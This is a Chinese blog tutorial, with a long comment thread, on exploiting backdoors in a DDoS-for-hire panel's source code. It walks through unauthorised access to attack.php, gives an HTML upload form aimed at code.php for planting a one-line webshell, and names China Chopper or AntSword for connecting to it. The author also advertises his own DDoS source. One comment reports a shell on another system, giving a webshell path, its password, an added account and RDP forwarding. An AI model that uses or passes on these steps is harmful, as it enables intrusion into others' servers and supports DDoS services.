前一段时间,发了一篇文章《对某DDOS页端源码的一次简单审计》
这篇文章很受欢迎但是很多人不会利用后门,我今天也就说一下后门利用方法 手动滑稽哈哈哈
好了话不多说我们开始教程!
后台越权访问
我们前台注册
账号密码随便输入即可,很随便那种 哈哈哈
然后登录,将URL改为
http(s)://目标站域名/后台地址/attack.php
然后就可以看到他的服务器/API
这个也是比较鸡肋的,我们需要知道后台地址.
任意文件上传
首先我们写一个html 如下
<html> <head> <meta charset="utf-8"> <title></title> </head> <body> <form action="http(s)://目标站域名/后台地址/code.php" method="post" enctype="multipart/form-data"> <label for="file"></label> <input type="file" name="file" id="file"> <input type="submit" name="t" value="上传"> </form> </body> </html>
打开这个html如图
我们选择我们的一句话进行上传即可 上传后一句话在
http(s)://目标站域名/后台地址/admin/上传的文件名
菜刀直连后门
这里我们打开中国蚁剑/中国菜刀
添加数据输入
此处为隐藏的内容!
发表评论并刷新,方可查看
全文至此,需要帮忙审计其他源码的可以评论联系我哦!
推荐一下我的DDOS源码(由此源码演变而来) 获取地址 《路人DDOS源码》
![[代码审计]CmsEasy V6.2](https://www.lurbk.com/wp-content/themes/begin/prune.php?src=https://www.lurbk.com/wp-content/uploads/2018/12/6661013-ed54d80e0407a395.png&w=280&h=210&a=&zc=1)
2020年3月10日 下午7:03 1F
转载请保留本文版权!谢谢
2020年3月10日 下午7:06 2F
少羽牛逼
2020年3月10日 下午7:28 3F
看看
2020年3月10日 下午8:32 4F
卧槽牛逼
2020年3月10日 下午9:14 5F
6批
2020年3月10日 下午9:24 6F
烧鱼牛逼
2020年3月10日 下午10:30 7F
转载请保留本文版权!谢谢
2020年3月11日 下午7:22 8F
666,我就不保留啊
2020年3月11日 下午9:35 9F
看看
2020年3月12日 下午10:00 10F
看看
2020年3月13日 上午12:27 11F
。。。嗯嗯
2020年3月13日 上午4:10 12F
55555好
2020年3月13日 上午9:47 13F
牛逼
2020年3月13日 上午10:35 14F
酷酷酷
2020年3月14日 下午1:44 15F
。。。。。。。。。。。?铭文
2020年3月14日 下午5:58 16F
www.fklr.design,有效时间为
2020年3月16日 下午3:50 17F
急急急
2020年3月16日 下午3:51 18F
牛逼
2020年3月16日 下午9:52 19F
少羽牛逼
2020年3月18日 上午2:26 20F
6666牛逼了,
2020年3月18日 下午10:28 21F
你中
2020年3月19日 下午9:47 22F
牛
2020年3月19日 下午10:50 23F
66666666666666666hh哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈
2020年3月20日 下午10:11 24F
123那些年息怒息怒
2020年3月20日 下午10:12 25F
你是男是女你说你是
2020年3月22日 下午5:40 26F
打打打打发
2020年3月23日 下午8:32 27F
刘辟!!!
2020年3月28日 下午3:02 28F
少羽大佬牛逼
2020年3月30日 下午5:31 29F
感谢楼主分享
2020年3月31日 上午8:07 30F
转载请保留本文版权!谢谢
2020年4月3日 上午11:05 31F
看看看
2020年4月6日 上午8:24 32F
66牛逼
2020年4月6日 上午10:42 33F
1哈哈哈
2020年4月7日 下午12:08 34F
转载请保留本文版权!谢谢
2020年4月9日 下午5:38 35F
牛皮
2020年4月10日 上午11:14 36F
大佬牛逼
2020年4月10日 下午11:19 37F
666666牛逼
2020年4月10日 下午11:22 38F
牛逼666
2020年4月15日 上午10:34 39F
装牛股回来哦明就会
2020年4月17日 下午8:08 40F
厉害
2020年4月20日 上午7:26 41F
牛逼牛逼牛逼
2020年4月20日 上午10:56 42F
牛批!我说怎么我的API老被偷呢
2020年4月20日 下午8:29 43F
找到你了
2020年4月20日 下午10:05 44F
看看
2020年4月22日 下午6:00 45F
牛6
2020年4月25日 上午10:29 46F
这是啥源码
2020年4月27日 下午1:53 47F
没看过上篇内容的来这里:#【技术分享】某监管系统存在漏洞演示【上篇】#
OK开始教程,,,,,,
上次已经getshell了
接下来我们先访问测试【图一】
部署一个菜刀马:http://211.xx.8.90:8888/aqcs/test00.jsp 密码:Atest@123_ok【网址不公布】【图二】
相关信息【图三】
添加测试帐号test612:【图四】【这里就不放了,之前在电脑上忘记保存了】
开始远程连接【图五】
成功,3389转发成功【图六】【图七】
结束
2020年4月27日 下午1:54 48F
少羽牛批
2020年5月1日 上午2:25 49F
66666nb牛逼
2020年5月13日 下午10:15 50F
666其实完全
2020年5月15日 下午11:54 51F
少羽牛逼
2020年5月30日 下午10:43 52F
qtgawegawegafaffdaaeg安抚
2020年5月30日 下午10:44 53F
呃呃呃额额
2020年6月2日 上午8:36 54F
牛批很好
2020年6月4日 上午12:24 55F
看看
2020年6月6日 上午5:26 56F
枯
2020年6月18日 上午11:46 57F
好牛逼的样子
2020年7月4日 下午1:29 58F
6666牛逼
2020年7月12日 上午11:59 59F
66666666牛逼
2020年7月14日 下午8:43 60F
看看
2020年7月15日 上午8:45 61F
66666666看看怎么样
2020年7月18日 下午3:42 62F
嘤嘤嘤
2020年7月23日 上午3:02 63F
支持一下,大佬
2020年7月24日 上午9:02 64F
看看
2020年7月27日 下午7:16 65F
666少于牛逼
2020年7月30日 上午11:11 66F
哈哈哈
2020年8月6日 下午9:55 67F
都到货好想你想你想你
2020年8月7日 下午5:10 68F
看看,应该还不错
2020年8月7日 下午5:12 69F
看看,应该不错吧
2020年8月9日 下午10:33 70F
飞洒发嘎斯
2020年8月11日 下午3:45 71F
牛逼
2020年8月13日 下午5:56 72F
看看看看
2020年8月15日 下午10:14 73F
阿斯达所大所大
2020年8月19日 上午11:43 74F
从v查德威v从
2020年8月19日 下午11:23 75F
不错哦
2020年8月28日 上午12:20 76F
大家都好都好还是打扮打扮大宝贝
2020年9月2日 上午4:22 77F
1撒旦
2020年9月10日 上午8:10 78F
66666我看看是不是真的
2020年9月10日 下午6:03 79F
评论看看
2020年9月13日 上午1:54 80F
看看哦
2020年9月13日 下午4:25 81F
看看
2020年9月25日 下午9:41 82F
烧鱼牛逼
2020年9月28日 上午12:38 83F
看看喽. .真的nb啊
2020年10月1日 上午9:43 84F
一群憨批的在瞎搞事。
2020年10月6日 下午5:19 85F
牛逼
2020年10月11日 下午9:35 86F
5755585好吃的饭
2020年10月31日 下午1:21 87F
6666支付
2020年11月8日 下午2:07 88F
这个很可以
2020年11月15日 下午9:02 89F
wfeWed二道区
2020年11月17日 上午11:34 90F
转载请保留本文版权!谢谢